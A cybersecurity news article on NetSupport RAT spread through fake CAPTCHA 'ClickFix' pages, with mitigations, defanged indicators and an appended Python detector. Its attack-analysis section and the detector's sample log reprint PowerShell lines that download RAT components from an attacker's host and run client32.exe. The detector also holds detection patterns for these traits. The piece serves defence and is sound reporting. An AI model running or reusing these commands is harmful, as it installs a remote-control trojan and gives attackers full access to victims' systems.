NetSupport RAT Grants Attackers Full Access to Victims' Systems


Cybersecurity experts have observed a significant increase in the use of the NetSupport Remote Access Trojan (RAT) in recent months, a malicious tool that allows attackers to gain full control over compromised systems.

This surge in activity has been linked to the “ClickFix” Initial Access Vector (IAV), a sophisticated social engineering technique that tricks users into executing malicious PowerShell commands.

NetSupport RAT, originally developed as a legitimate remote IT support tool in 1989, has been weaponized by cybercriminals to monitor screens, control keyboards and mice, upload and download files, and execute malicious commands.


If undetected, it can lead to severe consequences, including ransomware attacks, data breaches, and disruption of business operations.

ClickFix Fake Landing Page (Source – eSentire)

The ClickFix technique involves injecting fake CAPTCHA pages on compromised websites, instructing users to copy and execute PowerShell commands.

These commands download and install the NetSupport RAT client, establishing Command-and-Control (C2) connections to attacker-controlled gateways.

Deployment of NetSupport RAT (Source – eSentire)

Analysts at eSentire also found that the RAT payloads are often hosted on URLs containing “.png” in the path, and that the C2 gateway URLs frequently include “fakeurl.htm”.

NetSupport RAT Payload Hosting and C2 (Source – eSentire)

Attack Analysis

The PowerShell script used in ClickFix attacks typically involves the following steps:

  1. Random folder creation:
   $randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | ForEach-Object {[char]$_})
   $randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
   New-Item -ItemType Directory -Path $randomFolderPath
  2. Downloading RAT components:
   $url = "http://fbinter.com/a/1.png"
   $file = $randomFolderPath + "client32.ini"
   Invoke-WebRequest $url -OutFile $file

Similar commands are used to download other components like client32.exe and configuration files.

  3. Executing the RAT:
   $file12 = $randomFolderPath + "client32.exe"
   Start-Process $file12

PowerShell Script Content (Source – eSentire)

To protect against NetSupport RAT and ClickFix attacks, organizations should deploy Endpoint Detection and Response (EDR) agents on all corporate assets and conduct security awareness training to educate employees about emerging threats like ClickFix.

Limiting user permissions can also help prevent unauthorized software installations.

Organizations should also enhance security by disabling the Run prompt and restricting WScript.exe and Mshta.exe using Group Policy Objects (GPO) or Windows Defender Application Control (WDAC).

Staying informed about the latest IOCs and implementing effective security controls is crucial for protecting against these sophisticated threats.

Indicators of Compromise (IOCs)

  • ClickFix Pages:
  • hxxp[://]eveverify[.]com/captcha[.]html
  • hxxps[://]eiesoft.com/Ray-verify[.]html
  • NetSupport RAT Payload Delivery:
  • hxxp[://]fbinter[.]com/a/1[.]png
  • hxxp[://]fbinter[.]com/a/2[.]png
  • hxxp[://]fbinter[.]com/a/3[.]png
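As an added defender-side example (not code from the article or from eSentire), the following Python checker refangs the indicators listed above and scores PowerShell command lines, such as those captured by script block logging, for the traits described in the Attack Analysis section and the hosting/C2 traits reported earlier: a download from a “.png” URL, the client32.ini/client32.exe component names, a “fakeurl.htm” gateway URL, a folder under %APPDATA%, and a Start-Process launch. The sample log lines and the scoring thresholds are assumptions constructed for the example.

```python
import re
from typing import Dict, List

# The defanged indicators exactly as the article lists them.
DEFANGED_IOCS = [
    "hxxp[://]eveverify[.]com/captcha[.]html",
    "hxxps[://]eiesoft.com/Ray-verify[.]html",
    "hxxp[://]fbinter[.]com/a/1[.]png",
    "hxxp[://]fbinter[.]com/a/2[.]png",
    "hxxp[://]fbinter[.]com/a/3[.]png",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator (hxxp, [://], [.]) back into a comparable URL."""
    s = ioc.strip()
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    s = s.replace("[://]", "://").replace("[.]", ".")
    return s.lower()


REFANGED_IOCS = {refang(i) for i in DEFANGED_IOCS}

# Traits taken from the article's description of the ClickFix PowerShell stage
# and of the payload hosting / C2 gateway URLs.
PATTERNS = {
    "png_payload_url": re.compile(r"https?://\S+\.png\b", re.IGNORECASE),
    "netsupport_component": re.compile(r"client32\.(exe|ini)", re.IGNORECASE),
    "appdata_dir": re.compile(r"\$env:APPDATA|%APPDATA%", re.IGNORECASE),
    "download_cmdlet": re.compile(r"Invoke-WebRequest|\biwr\b", re.IGNORECASE),
    "start_process": re.compile(r"Start-Process", re.IGNORECASE),
    "fakeurl_gateway": re.compile(r"fakeurl\.htm", re.IGNORECASE),
}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def score_command(cmd: str) -> Dict[str, object]:
    """Score one command line. Verdict thresholds are an assumption for this example."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(cmd)]
    known = [u for u in URL_RE.findall(cmd) if u.lower() in REFANGED_IOCS]
    if known or "fakeurl_gateway" in hits or {"png_payload_url", "netsupport_component"} <= set(hits):
        verdict = "netsupport_clickfix"   # exact IOC or the article's payload pattern
    elif len(hits) >= 2:
        verdict = "suspicious"            # partial pattern, worth an analyst look
    else:
        verdict = "benign"
    return {"hits": hits, "known_iocs": known, "verdict": verdict}


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return every non-benign line with its index, hits and verdict."""
    flagged = []
    for idx, line in enumerate(lines):
        result = score_command(line)
        if result["verdict"] != "benign":
            flagged.append({"line": idx, "text": line, **result})
    return flagged


# Constructed sample script-block log lines (not real telemetry).
SAMPLE_LOG = [
    'Get-ChildItem $env:APPDATA',
    '$url = "http://fbinter.com/a/1.png"; Invoke-WebRequest $url -OutFile ($randomFolderPath + "client32.ini")',
    'Start-Process ($randomFolderPath + "client32.exe")',
    'Invoke-WebRequest https://example.invalid/report.pdf -OutFile report.pdf',
]

if __name__ == "__main__":
    for item in scan_lines(SAMPLE_LOG):
        print(item["line"], item["verdict"], item["hits"], item["known_iocs"])
```

Running the block flags the download line as netsupport_clickfix (both the “.png” payload pattern and an exact IOC match) and the Start-Process line as suspicious, while the ordinary directory listing and the PDF download stay benign. Exact URL matching on IOCs ages quickly, so the pattern rules carry the detection once the listed hosts rotate.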
